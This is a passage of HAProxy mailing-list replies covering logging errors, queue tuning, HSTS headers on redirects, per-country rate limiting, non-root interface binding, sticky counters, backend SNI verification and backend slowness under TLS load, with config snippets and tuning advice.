Re: ALERT:sendmsg logger #1 failed: Resource temporarily unavailable (errno=11)

2017-01-05 Thread Igor Cicimov
On Fri, Jan 6, 2017 at 12:20 AM, Patrick Hemmer 
wrote:

>
>
> On 2017/1/5 02:15, Igor Cicimov wrote:
>
> Hi all,
>
> On one of my haproxy's I get the following message on reload:
>
>
>[ALERT]
> 004/070949 (21440) : sendmsg logger #1 failed: Resource temporarily
> unavailable (errno=11)
>
> Has anyone seen this before or any pointers where to look for to correct
> this?
>
> Thanks,
> Igor
>
> Google has several entries on the subject:
> https://bugs.launchpad.net/kolla/+bug/1549753
> http://comments.gmane.org/gmane.comp.web.haproxy/4716
>
> -Patrick
>

Thanks Patrick I'll have a look.

Igor


Re: ALERT:sendmsg logger #1 failed: Resource temporarily unavailable (errno=11)

2017-01-05 Thread Igor Cicimov
On Fri, Jan 6, 2017 at 1:38 PM, Igor Cicimov  wrote:

>
>
> On Fri, Jan 6, 2017 at 12:20 AM, Patrick Hemmer 
> wrote:
>
>>
>>
>> On 2017/1/5 02:15, Igor Cicimov wrote:
>>
>> Hi all,
>>
>> On one of my haproxy's I get the following message on reload:
>>
>>
>>[ALERT]
>> 004/070949 (21440) : sendmsg logger #1 failed: Resource temporarily
>> unavailable (errno=11)
>>
>> Has anyone seen this before or any pointers where to look for to correct
>> this?
>>
>> Thanks,
>> Igor
>>
>> Google has several entries on the subject:
>> https://bugs.launchpad.net/kolla/+bug/1549753
>> http://comments.gmane.org/gmane.comp.web.haproxy/4716
>>
>> -Patrick
>>
>
> Thanks Patrick I'll have a look.
>
> Igor
>

Increasing the /proc/sys/net/unix/max_dgram_qlen size and restarting
rsyslog fixed the issue for me. Thanks again.

Igor


Re: Two tiered haproxy setup and managing queues and back pressure

2017-02-15 Thread Igor Cicimov
On 15 Feb 2017 7:59 pm, "Juho Mäkinen"  wrote:

We have a setup which requires us to have two haproxy tiers so that the first
forwards connections to the second. What I want to know is the theory of how
(and why) I should tune my maxconn, backlog and timeout settings to handle
queues, overloads and back pressure in situations where my backends are
overloaded.

Think of an array of virtual servers called A, whose size is between 10-20.
Then there is another array B, whose size is 100-200. A client on the A
servers wants to connect to a random worker in array B.

Each machine in B contains a haproxy which will have a single listen clause
with backends which are pointed to workers in the same host. This means
that all connections to a worker in a host in the array B will go through
the haproxy in that host.

Servers A have haproxies which have a listen clause so that each server in
the B array will have one backend set. Clients in servers A will connect to
localhost so they will reach the haproxy in machine A which will route the
request to a suitable server B haproxy and where that haproxy will route it
to a worker in that node.

This works, but I'm not sure how I should tune my configuration so that if
any server in the B array gets overloaded, the haproxies in server array A
will avoid this server. I'm thinking that I should use the "retries" setting
in haproxy A so that if it can't connect to the first selected server B it
would try another.


If you have a single B array server in the A listener, the retries will not
help.

But I'm not sure how I should configure haproxy B so that this is done?


Sounds like you need more than one B array server per A listener, so A can
retry (or load-balance to a different one, if you like) in case the first
one chosen is not responding.
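A minimal sketch of what that could look like on an A-tier haproxy (the names, addresses, limits and timers here are assumptions, not from the thread):

```
# A-tier haproxy: give each listener several B-tier servers so a failed
# connect can be retried against a different one.
listen a_tier
    bind 127.0.0.1:8080
    mode tcp
    balance roundrobin
    retries 3
    option redispatch          # retry against a *different* server on failure
    timeout connect 2s
    server b1 10.0.1.10:8080 check maxconn 100
    server b2 10.0.1.11:8080 check maxconn 100
    server b3 10.0.1.12:8080 check maxconn 100
```

With "option redispatch", a connection that fails against the first chosen B server is re-dispatched to another one, which is what gives the A tier a way around an overloaded B node.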

If I set both the maxconn and backlog settings low enough in B, will this
cause this to happen, and what is actually going on in terms of SYN, SYN+ACK,
kernel backlog queues and haproxy frontend queues?

I'm pretty sure I need to lab this out so that I can use wireshark to really
look at what is going on, but the lab setup is non-trivial and I could use
some good theory on how this should work.

 - Garo


Re: add header into http-request redirect

2017-02-26 Thread Igor Cicimov
Hi Lukas,

On 27 Feb 2017 5:53 am, "Lukas Tribus"  wrote:

Hi,



On 26.02.2017 at 19:02, thierry.fourn...@arpalert.org wrote:

> Hi,
>
> If I understand, the 301 is produced by haproxy. If that is the case,
> there is an ugly solution.
>
> Haproxy can't add a header to a redirect because redirect is a final
> directive. After executing the redirect, no more actions are executed.
>
> The trick is to create a listen proxy dedicated to the redirect, and
> modify the response of that proxy from the main proxy. If a dedicated
> proxy produces the response, the main proxy considers this as forwarded
> traffic and can add headers.
>

Also see:
http://blog.haproxy.com/2015/06/09/haproxy-and-http-strict-transport-security-hsts-header-in-http-redirects/


Lukas

Maybe I'm stupid but in the example from the link you sent:

frontend fe_myapp
 bind :443 ssl crt /path/to/my/cert.pem
 bind :80
 use_backend be_dummy if !{ ssl_fc }
 default_backend be_myapp

backend be_myapp
 http-response set-header Strict-Transport-Security max-age=1600;\
includeSubDomains;\ preload;
 server s1 10.0.0.1:80

backend be_dummy
 server haproxy_fe_dummy_ssl_redirect 127.0.0.1:8000

frontend fe_dummy
 bind 127.0.0.1:8000
 http-request redirect scheme https

I don't see how the HSTS header is being inserted in the redirect?


Re: add header into http-request redirect

2017-02-26 Thread Igor Cicimov
On 27 Feb 2017 9:19 am, "Igor Cicimov" 
wrote:

Hi Lukas,

On 27 Feb 2017 5:53 am, "Lukas Tribus"  wrote:

Hi,



On 26.02.2017 at 19:02, thierry.fourn...@arpalert.org wrote:

> Hi,
>
> If I understand, the 301 is produced by haproxy. If that is the case,
> there is an ugly solution.
>
> Haproxy can't add a header to a redirect because redirect is a final
> directive. After executing the redirect, no more actions are executed.
>
> The trick is to create a listen proxy dedicated to the redirect, and
> modify the response of that proxy from the main proxy. If a dedicated
> proxy produces the response, the main proxy considers this as forwarded
> traffic and can add headers.
>

Also see:
http://blog.haproxy.com/2015/06/09/haproxy-and-http-strict-transport-security-hsts-header-in-http-redirects/


Lukas

Maybe I'm stupid but in the example from the link you sent:

frontend fe_myapp
 bind :443 ssl crt /path/to/my/cert.pem
 bind :80
 use_backend be_dummy if !{ ssl_fc }
 default_backend be_myapp

backend be_myapp
 http-response set-header Strict-Transport-Security max-age=1600;\
includeSubDomains;\ preload;
 server s1 10.0.0.1:80

backend be_dummy
 server haproxy_fe_dummy_ssl_redirect 127.0.0.1:8000

frontend fe_dummy
 bind 127.0.0.1:8000
 http-request redirect scheme https

I don't see how the HSTS header is being inserted in the redirect?

Except if the purpose was to point out the fact that HSTS in an HTTP
response is going to be ignored...
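For what it's worth, one way to read the blog's trick is that the header must be added where the main proxy sees the redirect as a server response, i.e. on the path through be_dummy. A hedged sketch, assuming that reading is right (this is my interpretation, not the blog's exact config):

```
frontend fe_myapp
    bind :443 ssl crt /path/to/my/cert.pem
    bind :80
    # Applied to every response leaving this frontend, including the 301
    # generated by fe_dummy and relayed back through be_dummy.
    http-response set-header Strict-Transport-Security max-age=1600;\ includeSubDomains;\ preload;
    use_backend be_dummy if !{ ssl_fc }
    default_backend be_myapp

backend be_dummy
    server haproxy_fe_dummy_ssl_redirect 127.0.0.1:8000

frontend fe_dummy
    bind 127.0.0.1:8000
    http-request redirect scheme https
```

Because the redirect is produced by fe_dummy and merely proxied by fe_myapp, the http-response rule in fe_myapp can decorate it, which a bare "http-request redirect" in the same proxy could not.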


Re: Rate limit by country

2017-02-28 Thread Igor Cicimov
On Tue, Feb 28, 2017 at 2:29 PM, Simon Green  wrote:

> Hi all,
>
> I need to rate limit users by country[1], and my Google foo is failing
> me. I know that I can use "src_conn_rate gt N"[2], but that rate limits
> on a per IP basis. I want to be able to rate limit based on the total
> number of connections from a country, and have different limits for
> different countries.
>
> Is this possible with HAProxy, and if so, how?
>
> TIA for your guidance.
>
> --
> Simon
>
>
> [1] where "country" is defined by MaxMind's GeoIP list. It's not
> perfect, but better than nothing.
> [2] and along with src -f TLD.lst can set different limits for different
> countries.
>
>
https://github.com/berkayunal/haproxy-geoip-iprange
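One way to combine the pieces mentioned above (per-country CIDR data plus a conn-rate stick table) so the rate aggregates per country rather than per IP; the map file path, country codes and thresholds are assumptions, and the CIDR-to-country map would come from a GeoIP dump such as the one the linked tool generates:

```
frontend fe_web
    bind :80
    # One stick-table entry per *country code*, so rates aggregate per
    # country. geoip.map (assumed path) maps CIDRs to ISO codes, one per
    # line, e.g.: "1.2.3.0/24 AU"
    stick-table type string len 2 size 1k expire 60s store conn_rate(60s)
    tcp-request inspect-delay 5s
    tcp-request content track-sc0 src,map_ip(/etc/haproxy/geoip.map,XX)
    acl is_au src,map_ip(/etc/haproxy/geoip.map,XX) -m str AU
    acl is_de src,map_ip(/etc/haproxy/geoip.map,XX) -m str DE
    # Different limits per country:
    tcp-request content reject if is_au { sc0_conn_rate gt 50 }
    tcp-request content reject if is_de { sc0_conn_rate gt 200 }
    default_backend be_app
```

The key move is tracking the map_ip() output instead of src, so all addresses in one country share a single stick-table entry and its connection rate.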


Re: Binding to interface as non-root user

2017-03-24 Thread Igor Cicimov
On 24 Mar 2017 5:18 pm, "Ankit Malp"  wrote:

tldr; Is there a way to bind a frontend to interface and still be able to
start HAProxy as root and later lower privileges to a non root user?

I asked this question at http://serverfault.com/questions/840039/haproxy-interface-eth-aware-binding-as-non-root-user
but did not get replies and thought this community might be a better place. I
have a scenario where I need to listen explicitly on network interfaces. This
works great if I do not set an explicit lower-privileged user (the proxy runs
as root throughout its life).

However, I would prefer to not run the proxy as root.

Config snippet

global
# Works only without the line below, but the implication is running as the root user
user haproxy

frontend frontend_tcp_eth1
mode tcp
bind 0.0.0.0:80 interface eth1

Simply use iptables:

iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

and have haproxy listen on port 8080


Reading through the docs, I only see root permissions necessary to bind for
outgoing connections, but not for listening on an interface. Am I missing
something?

https://cbonte.github.io/haproxy-dconv/1.6/management.html#13
"HAProxy will need to be started as root in order to :
   - adjust the file descriptor limits
   - bind to privileged port numbers
   - bind to a specific network interface
   - transparently listen to a foreign address
   - isolate itself inside the chroot jail
   - drop to another non-privileged UID
HAProxy may require to be run as root in order to :
   - bind to an interface for outgoing connections
   - bind to privileged source ports for outgoing connections
   - transparently bind to a foreign address for outgoing connections
Most users will never need the "run as root" case. But the "start as root"
covers most usages."

Thanks,
Ankit


Re: trying to understand sticky counters

2017-04-20 Thread Igor Cicimov
Hi Adam,

On Wed, Apr 12, 2017 at 3:00 AM, Adam Spiers  wrote:

> Hi all,
>
> I've pored over the Configuration Manual again and again, and I'm
> still struggling to fully understand sticky counters.  This paragraph
> seems to hold some important information:
>
>Once a "track-sc*" rule is executed, the key is looked up in the table
>and if it is not found, an entry is allocated for it. Then a pointer to
>that entry is kept during all the session's life, and this entry's
>counters are updated as often as possible, every time the session's
>counters are updated, and also systematically when the session ends.
>Counters are only updated for events that happen after the tracking has
>been started. As an exception, connection counters and request counters
>are systematically updated so that they reflect useful
>information.
>
> It seems that one of the key concepts here is "session".  I'm assuming
> that this actually means "TCP session", as in layer 5 of the OSI
> model; is that correct?


Just a correction here, see
https://en.wikipedia.org/wiki/Session_layer#Comparison_with_TCP.2FIP_model


> Unfortunately there is nowhere in the manual
> which explicitly states this definition, despite countless uses of the
> term, but there are some hints scattered around, e.g. in the
> "tcp-request session" section:
>
>Once a session is validated, (ie. after all handshakes have been
> completed),
>
> and in the "reject" part of the "tcp-request connection" section.
>
> It seems that each session can have a maximum of three entries
> associated with it in stick-tables, because there is a maximum of 3
> sets of sticky counters per connection.  And these entries could
> potentially be in 1, 2, or 3 different stick-tables, depending on
> where and how the track-scX directive is written, right?
>
> Thirdly, I'm struggling to understand these examples:
>
>  Example: accept all connections from white-listed hosts, reject too fast
>   connection without counting them, and track accepted connections.
>   This results in connection rate being capped from abusive
> sources.
>
>tcp-request connection accept if { src -f
> /etc/haproxy/whitelist.lst }
>tcp-request connection reject if { src_conn_rate gt 10 }
>tcp-request connection track-sc0 src
>
>  Example: accept all connections from white-listed hosts, count all other
>   connections and reject too fast ones. This results in abusive
> ones
>   being blocked as long as they don't slow down.
>
>tcp-request connection accept if { src -f
> /etc/haproxy/whitelist.lst }
>tcp-request connection track-sc0 src
>tcp-request connection reject if { sc0_conn_rate gt 10 }
>
> The stick-table directives are missing, but my experiments suggest
> that not only they are mandatory, but also they must track conn_rate
> samples, otherwise HAProxy has no way to know the duration of the
> sliding time window which the connection rate relates to, and nothing
> will get rejected.  So I think the examples should include those
> directives for clarity.  When I added this, it worked for me:
>
> stick-table type ip size 100k store conn_rate(30s)
>
> Furthermore, I don't understand the explanation text which says
> "without counting them".  If they're not counted, how can the
> connection rate be measured?  So what is the real difference between
> these two examples?
>
> I'd be really grateful for any light which can be shed here.  I'm
> normally pretty good at inhaling large, complex technical manuals, but
> I've really been struggling with HAProxy's for some reason :-/
>
> Thanks!
> Adam
>
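Putting the manual's second example together with the stick-table directive Adam found necessary, a complete self-contained frontend might look like this (whitelist path, table size and limit taken from the quoted text; the frontend and backend names are placeholders):

```
frontend fe_in
    bind :80
    # The stick-table must store conn_rate, otherwise sc0_conn_rate has
    # no sliding window to measure against and nothing gets rejected.
    stick-table type ip size 100k expire 60s store conn_rate(30s)
    tcp-request connection accept if { src -f /etc/haproxy/whitelist.lst }
    tcp-request connection track-sc0 src
    tcp-request connection reject if { sc0_conn_rate gt 10 }
    default_backend be_app
```

This is the "count all, then reject too-fast ones" variant: because track-sc0 runs before the reject rule, even rejected clients keep updating their entry, so an abusive source stays blocked until it slows down.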
>


-- 
Igor Cicimov | DevOps


Re: Passing SNI value ( ssl_fc_sni ) to backend's verifyhost.

2017-05-05 Thread Igor Cicimov
On 6 May 2017 2:04 am, "Kevin McArthur"  wrote:

When doing tls->haproxy->tls (bridged https) re-encryption with SNI, we
need to verify the backend certificate against the SNI value requested by
the client.

Something like server options:

server app1 app1.example.ca:443 ssl no-sslv3 sni ssl_fc_sni verify required
verifyhost ssl_fc_sni

However, the "verifyhost ssl_fc_sni" part doesn't currently work. Is there
any chance I could get this support patched in?

Most folks seem to be either ignoring the backend server validation, setting
verify none, or stripping TLS altogether, leaving a pretty big security
hole.

Care to elaborate on why this is a security hole if the backend servers are
on an internal LAN, which is usually the case when terminating SSL on the proxy?


--

Kevin McArthur


Re: HAProxy makes backend unresponsive when handling multiple thousand connections per second

2017-06-21 Thread Igor Cicimov
On 21 Jun 2017 6:11 pm, "Daniel Heitepriem" 
wrote:

Hi Jarno,

yes we are decrypting TLS on the frontend (official SSL-certificate) and
re-encrypt it before sending it to the backend (company policy so not that
easy to change it to an unencrypted connection). The CPU usage is not
higher than 15-20% even during peak times and the memory usage is also
quite low (200-800MB).

Regards,
Daniel

On 21.06.17 at 10:00, Jarno Huuskonen wrote:

Hi,
>
> On Wed, Jun 21, Daniel Heitepriem wrote:
>
>> we got a problem recently which we can't explain to ourselves. We got
>> a java application (Tomcat WAR-File) which has to handle several
>> million of requests per day and several thousand requests per second
>> during peak times. Due to this high amount we are splitting traffic
>> using an ACL in "booking traffic" and "availability traffic".
>> Booking traffic is negligible but the Availability traffic is
>> load-balanced over several application servers. The problem that
>> occurs is that our external partner "floods" the
>> Availability-Frontend with several thousand requests per second and
>> the backend becomes unresponsive. If we redirect them directly to
>>
> Looks like you're decrypting tls/ssl on frontend and then
> re-encrypting on backend/server. Is one core(you're not using nbproc?)
> able to handle thousand ssl requests coming in and going out ?
> (is haproxy process using 100% cpu).
>
> -Jarno
>
>
What do you see in the haproxy log when the problem happens?


Re: HAProxy makes backend unresponsive when handling multiple thousand connections per second

2017-06-21 Thread Igor Cicimov
On 21 Jun 2017 6:34 pm, "Daniel Heitepriem" 
wrote:

Nothing special. No errors, no dropped connections just an increased server
response time (Tr). An excerpt from low and high traffic times is below:

Jun 20 18:05:29 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.28
client_ip:193.XX.XX.XXX client_port:50876 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:157 Tq:95 Tw:0 Tc:2 Tr:60
Jun 20 18:05:29 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.41
client_ip:193.XX.XX.XXX client_port:32910 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:148 Tq:82 Tw:0 Tc:1 Tr:65
Jun 20 18:05:30 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.40
client_ip:193.XX.XX.XXX client_port:51077 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:525 Tq:312 Tw:0 Tc:2 Tr:211

Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.28
client_ip:193.XX.XX.XXX client_port:48936 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:25368 Tq:101 Tw:0 Tc:3 Tr:25264
Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.41
client_ip:193.XX.XX.XXX client_port:43030 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:23474 Tq:88 Tw:0 Tc:2 Tr:23383
Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.40
client_ip:193.XX.XX.XXX client_port:18935 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:26150 Tq:106 Tw:0 Tc:3 Tr:26040


On 21.06.17 at 10:21, Igor Cicimov wrote:



On 21 Jun 2017 6:11 pm, "Daniel Heitepriem" 
wrote:

Hi Jarno,

yes we are decrypting TLS on the frontend (official SSL-certificate) and
re-encrypt it before sending it to the backend (company policy so not that
easy to change it to an unencrypted connection). The CPU usage is not
higher than 15-20% even during peak times and the memory usage is also
quite low (200-800MB).

Regards,
Daniel

On 21.06.17 at 10:00, Jarno Huuskonen wrote:

Hi,
>
> On Wed, Jun 21, Daniel Heitepriem wrote:
>
>> we got a problem recently which we can't explain to ourself. We got
>> a java application (Tomcat WAR-File) which has to handle several
>> million of requests per day and several thousand requests per second
>> during peak times. Due to this high amount we are splitting traffic
>> using an ACL in "booking traffic" and "availability traffic".
>> Booking traffic is negligible but the Availability traffic is
>> load-balanced over several application servers. The problem that
>> occurs is that our external partner "floods" the
>> Availability-Frontend with several thousand requests per second and
>> the backend becomes unresponsive. If we redirect them directly to
>>
> Looks like you're decrypting tls/ssl on frontend and then
> re-encrypting on backend/server. Is one core(you're not using nbproc?)
> able to handle thousand ssl requests coming in and going out ?
> (is haproxy process using 100% cpu).
>
> -Jarno
>
>
What do you see in the haproxy log when the problem happens?


-- 
Mit freundlichen Gruessen / Best regards
Daniel Heitepriem

pribas GmbH

Valterweg 24-25
65817 Eppstein-Bremthal
Germany

Phone  +49 (0) 6198 57146400 <+49%206198%2057146400>
Fax   +49 (0) 6198 57146433 <+49%206198%2057146433>
eMail   daniel.heitepr...@pribas.com

Corporate Headquarters: Huenfelden-Dauborn Managing Director: Arnulf Pribas
Registration: Amtsgericht Limburg a. d. Lahn 7HRB874 Tax ID: DE113840457


Daniel, if using SSL to the backends shouldn't you use http mode? Per your
config you are using tcp, which is the default one. AFAIK tcp is for SSL
passthrough.


Re: HAProxy makes backend unresponsive when handling multiple thousand connections per second

2017-06-21 Thread Igor Cicimov
Yes, saw it but too late. Anyway, according to the timers, Tr:26040 means
it took 26 seconds for the server to send the response. Any errors in the
backend logs?

client_ip:193.XX.XX.XXX client_port:18935 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:26150 Tq:106 Tw:0 Tc:3 Tr:26040


Try adding:

option httpclose

in the backend and see if that helps.

On 21 Jun 2017 7:48 pm, "Daniel Heitepriem" 
wrote:

Hi Igor,

the config is set to "mode http" (see below); only the log output is set to
"tcplog" to be able to get more detailed log output. Please correct me if
I'm wrong, but according to the config, HTTP mode is (or at least should be)
used.


defaults
log global
option tcplog
log-format %f\ %b/%s\ client_ip:%ci\ client_port:%cp\
SSL_version:%sslv\ SSL_cypher:%sslc\ %ts\ Tt:%Tt\ Tq:%Tq\ Tw:%Tw\ Tc:%Tc\
Tr:%Tr
mode http
timeout connect 5000
timeout check 5000
timeout client 3
timeout server 3
retries 3

frontend ndc
http-response set-header Strict-Transport-Security max-age=31536000;\
includeSubdomains;\ preload
http-response set-header X-Content-Type-Options nosniff

bind *:443 ssl crt /opt/etc/haproxy/domain_com.pem force-tlsv12 no-sslv3
maxconn 2

acl fare_availability path_beg /ndc/fare/v1/availability
acl flight_availability path_beg /ndc/flight/v1/availability
use_backend vakanz-backend if flight_availability or fare_availability
default_backend booking-backend

backend booking-backend
server 10.2.8.28 10.2.8.23:8443 check ssl verify none minconn 500
maxconn 500

backend vakanz-backend
server 10.2.8.28 10.2.8.28:8443 check ssl verify none minconn 500
maxconn 500
server 10.2.8.40 10.2.8.40:8443 check ssl verify none minconn 500
maxconn 500
server 10.2.8.41 10.2.8.41:8443 check ssl verify none minconn 500
maxconn 500

Regards,
Daniel

On 21.06.17 at 11:37, Igor Cicimov wrote:



On 21 Jun 2017 6:34 pm, "Daniel Heitepriem" 
wrote:

Nothing special. No errors, no dropped connections just an increased server
response time (Tr). An excerpt from low and high traffic times is below:

Jun 20 18:05:29 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.28
client_ip:193.XX.XX.XXX client_port:50876 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:157 Tq:95 Tw:0 Tc:2 Tr:60
Jun 20 18:05:29 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.41
client_ip:193.XX.XX.XXX client_port:32910 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:148 Tq:82 Tw:0 Tc:1 Tr:65
Jun 20 18:05:30 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.40
client_ip:193.XX.XX.XXX client_port:51077 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:525 Tq:312 Tw:0 Tc:2 Tr:211

Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.28
client_ip:193.XX.XX.XXX client_port:48936 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:25368 Tq:101 Tw:0 Tc:3 Tr:25264
Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.41
client_ip:193.XX.XX.XXX client_port:43030 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:23474 Tq:88 Tw:0 Tc:2 Tr:23383
Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.40
client_ip:193.XX.XX.XXX client_port:18935 SSL_version:TLSv1.2
SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:26150 Tq:106 Tw:0 Tc:3 Tr:26040


On 21.06.17 at 10:21, Igor Cicimov wrote:



On 21 Jun 2017 6:11 pm, "Daniel Heitepriem" 
wrote:

Hi Jarno,

yes we are decrypting TLS on the frontend (official SSL-certificate) and
re-encrypt it before sending it to the backend (company policy so not that
easy to change it to an unencrypted connection). The CPU usage is not
higher than 15-20% even during peak times and the memory usage is also
quite low (200-800MB).

Regards,
Daniel

On 21.06.17 at 10:00, Jarno Huuskonen wrote:

Hi,
>
> On Wed, Jun 21, Daniel Heitepriem wrote:
>
>> we got a problem recently which we can't explain to ourself. We got
>> a java application (Tomcat WAR-File) which has to handle several
>> million of requests per day and several thousand requests per second
>> during peak times. Due to this high amount we are splitting traffic
>> using an ACL in "booking traffic" and "availability traffic".
>> Booking traffic is negligible but the Availability traffic is
>> load-balanced over several application servers. The problem that
>> occurs is that our external partner "floods" the
>> Availability-Frontend with several thousand requests per second and
>> the backend becomes unresponsive. If we redirect them directly to
>>
> Looks like you're decrypting tls/ssl on frontend and then
> re-encrypting on backend/server. Is one core(you're not using nbproc?)
> able to handle thousand ssl requests coming in and going out ?
> (is haproxy process using 100% cpu).

Re: HAProxy makes backend unresponsive when handling multiple thousand connections per second

2017-06-21 Thread Igor Cicimov
Sorry, replace httpclose with  http-server-close

On 21 Jun 2017 7:55 pm, "Igor Cicimov" 
wrote:

> Yes saw it but too late. Anyway according to the timers the Tr:26040 means
> it took 26 seconds for the server to send the response. Any errors in the
> backend logs?
>
> client_ip:193.XX.XX.XXX client_port:18935 SSL_version:TLSv1.2
> SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:26150 Tq:106 Tw:0 Tc:3 Tr:26040
>
>
> Try adding:
>
> option httpclose
>
> in the backend and see if that helps.
>
> On 21 Jun 2017 7:48 pm, "Daniel Heitepriem" 
> wrote:
>
> Hi Igor,
>
> the config is set to "mode http" (see below) only the log output is set to
> "tcplog" to be able to get a more detailed log output. Please correct me if
> I'm wrong but regarding to the config HTTP-mode is (or at least should be)
> used.
>
>
> defaults
> log global
> option tcplog
> log-format %f\ %b/%s\ client_ip:%ci\ client_port:%cp\
> SSL_version:%sslv\ SSL_cypher:%sslc\ %ts\ Tt:%Tt\ Tq:%Tq\ Tw:%Tw\ Tc:%Tc\
> Tr:%Tr
> mode http
> timeout connect 5000
> timeout check 5000
> timeout client 3
> timeout server 3
> retries 3
>
> frontend ndc
> http-response set-header Strict-Transport-Security max-age=31536000;\
> includeSubdomains;\ preload
> http-response set-header X-Content-Type-Options nosniff
>
> bind *:443 ssl crt /opt/etc/haproxy/domain_com.pem force-tlsv12
> no-sslv3
> maxconn 2
>
> acl fare_availability path_beg /ndc/fare/v1/availability
> acl flight_availability path_beg /ndc/flight/v1/availability
> use_backend vakanz-backend if flight_availability or fare_availability
> default_backend booking-backend
>
> backend booking-backend
> server 10.2.8.28 10.2.8.23:8443 check ssl verify none minconn 500
> maxconn 500
>
> backend vakanz-backend
> server 10.2.8.28 10.2.8.28:8443 check ssl verify none minconn 500
> maxconn 500
> server 10.2.8.40 10.2.8.40:8443 check ssl verify none minconn 500
> maxconn 500
> server 10.2.8.41 10.2.8.41:8443 check ssl verify none minconn 500
> maxconn 500
>
> Regards,
> Daniel
>
> On 21.06.17 at 11:37, Igor Cicimov wrote:
>
>
>
> On 21 Jun 2017 6:34 pm, "Daniel Heitepriem" 
> wrote:
>
> Nothing special. No errors, no dropped connections just an increased
> server response time (Tr). An excerpt from low and high traffic times is
> below:
>
> Jun 20 18:05:29 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.28
> client_ip:193.XX.XX.XXX client_port:50876 SSL_version:TLSv1.2
> SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:157 Tq:95 Tw:0 Tc:2 Tr:60
> Jun 20 18:05:29 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.41
> client_ip:193.XX.XX.XXX client_port:32910 SSL_version:TLSv1.2
> SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:148 Tq:82 Tw:0 Tc:1 Tr:65
> Jun 20 18:05:30 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.40
> client_ip:193.XX.XX.XXX client_port:51077 SSL_version:TLSv1.2
> SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:525 Tq:312 Tw:0 Tc:2 Tr:211
>
> Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.28
> client_ip:193.XX.XX.XXX client_port:48936 SSL_version:TLSv1.2
> SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:25368 Tq:101 Tw:0 Tc:3 Tr:25264
> Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.41
> client_ip:193.XX.XX.XXX client_port:43030 SSL_version:TLSv1.2
> SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:23474 Tq:88 Tw:0 Tc:2 Tr:23383
> Jun 20 22:05:36 localhost haproxy[13426]: ndc vakanz-backend/10.2.8.40
> client_ip:193.XX.XX.XXX client_port:18935 SSL_version:TLSv1.2
> SSL_cypher:DHE-RSA-AES256-GCM-SHA384 -- Tt:26150 Tq:106 Tw:0 Tc:3 Tr:26040
>
>
> On 21.06.17 at 10:21, Igor Cicimov wrote:
>
>
>
> On 21 Jun 2017 6:11 pm, "Daniel Heitepriem" 
> wrote:
>
> Hi Jarno,
>
> yes we are decrypting TLS on the frontend (official SSL-certificate) and
> re-encrypt it before sending it to the backend (company policy so not that
> easy to change it to an unencrypted connection). The CPU usage is not
> higher than 15-20% even during peak times and the memory usage is also
> quite low (200-800MB).
>
> Regards,
> Daniel
>
> On 21.06.17 at 10:00, Jarno Huuskonen wrote:
>
> Hi,
>>
>> On Wed, Jun 21, Daniel Heitepriem wrote:
>>
>>> we got a problem recently which we can't explain to ourself. We got
>>> a java application (Tomcat WAR-File) which has to handle several
>>> million of requests per day and several thousand requests per second
>>> during peak times. Due to this high amount we are splitting traffic
>>> using an ACL in "booking traffic" and "availability traffic".

Re: HAProxy makes backend unresponsive when handling multiple thousand connections per second

2017-06-21 Thread Igor Cicimov
Hi Lukas,

On 22 Jun 2017 3:02 am, "Lukas Tribus"  wrote:

Hello,


> Daniel, if using ssl to the backends shouldn't you use http mode?
> Per your config you are using tcp which is default one. Afaik tcp
> is for ssl passthrough.

For the record, this is not true. Just because you need TCP mode
for TLS passthrough, doesn't mean you have to use HTTP mode when
terminating TLS.

Actually, terminating TLS while using TCP mode is a quite common
configuration (for example with HTTP/2).


Thanks for clarifying this.




>> Try adding:
>> option httpclose
>> in the backend and see if that helps.
>
> Sorry, replace httpclose with  http-server-close

Actually, I would have suggested the opposite: making the whole
thing less expensive, by going full blown keep-alive with
http-reuse:

option http-keep-alive
option prefer-last-server
timeout http-keep-alive 30s
http-reuse safe


Keep-alive is on by default, hence my suggestion to try the opposite. Of
course, keep-alive enabled is always better, especially in the case of SSL.




> global
>  ulimit-n 2

Why specify ulimit? Haproxy will do this for you, you are just
